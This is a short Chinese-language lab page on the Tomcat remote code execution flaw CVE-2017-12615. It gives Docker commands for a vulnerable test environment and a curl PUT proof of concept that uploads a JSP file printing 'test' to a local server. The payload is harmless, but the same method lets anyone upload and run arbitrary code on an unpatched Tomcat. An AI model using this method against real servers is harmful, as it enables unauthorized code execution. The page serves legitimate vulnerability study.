Tomcat 远程代码执行漏洞 (CVE-2017-12615)

漏洞信息

根据测试发现 7.0.81 并未修复完全，可绕过，具体参考下方paper链接

云鼎实验室：Tomcat 远程代码执行漏洞分析（CVE-2017-12615）及补丁 Bypass

获取环境:

拉取镜像到本地

$ docker pull medicean/vulapps:t_tomcat_1

启动环境
```
$ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_1
```
-p 8080:8080 前面的 8080 代表物理机的端口，可随意指定。

使用与利用

访问 http://你的 IP 地址:端口号/

PoC

向目标发起 PUT 请求，注意后缀为 .jsp/

$ curl -X PUT "http://127.0.0.1:8080/123.jsp/" -d '<%out.println("test");%>'

然后访问目标地址 http://127.0.0.1:8080/123.jsp, 即可看到输出了 test

参考链接

Tomcat代码执行漏洞分析测试(附POC)

Comments